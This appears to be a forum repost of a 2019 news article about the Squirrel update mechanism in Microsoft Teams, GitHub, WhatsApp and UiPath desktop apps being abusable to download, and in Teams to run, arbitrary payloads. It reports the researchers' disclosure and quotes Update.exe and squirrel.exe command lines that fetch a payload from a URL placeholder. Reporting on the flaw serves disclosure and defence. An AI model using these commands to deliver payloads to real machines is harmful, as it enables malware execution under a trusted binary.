Windows News and info 15th Anniversary 2009-2024

Windows 11 | Windows 10 Modifying => Patch Tuesday| Updates | Security | Privacy | Anti-virus => Topic started by: javajolt on June 29, 2019, 04:26:34 PM

Title: Microsoft Teams Can Be Used to Download and Run Malicious Packages
Post by: javajolt on June 29, 2019, 04:26:34 PM
(http://i.postimg.cc/ydKZs19b/microsoft-teams-compliance-compressed.jpg)
The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.

The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload.

These applications rely on the open source Squirrel (http://github.com/Squirrel/Squirrel.Windows) project to manage installation and updating routines, which uses NuGet (http://docs.microsoft.com/en-us/nuget/what-is-nuget) package manager to create the necessary files.

Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'

With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:

Quote
Update.exe --update [url to payload]

squirrel.exe --update [url to payload]
The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.

Quote
Update.exe --download [url to payload]

squirrel.exe --download [url to payload]
The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts (LOLBAS (http://lolbas-project.github.io/)) database on GitHub, directly accessible here (http://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/) and here (http://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/).

Reverse engineer Reegun Richard (http://twitter.com/reegun21) tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.

Trying to replicate the effect with GitHub, and WhatsApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft Teams made the details public before Microsoft released a patch.

Another researcher playing for the red team, Mr. Un1k0d34 (http://twitter.com/MrUn1k0d3r) of the RingZer0 (http://ringzer0ctf.com/) Team, had found the issue and published the details.

(http://i.postimg.cc/YqMpp4v7/Capture.png)

In a thread (http://twitter.com/reegun21/status/1144109729737691136) on Twitter, Richard explains the process of finding the bug and its root. He started from previous (http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/) research published in late March by Hexacorn (http://twitter.com/Hexacorn), which focused on living-of-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post (http://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12) from the researcher.



Microsoft Teams is intended for business use as it is a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meeting, file storage, and collaboration features. Its supports extensions for integration with products from other developers.

source (http://www.bleepingcomputer.com/news/security/microsoft-teams-can-be-used-to-download-and-run-malicious-packages/)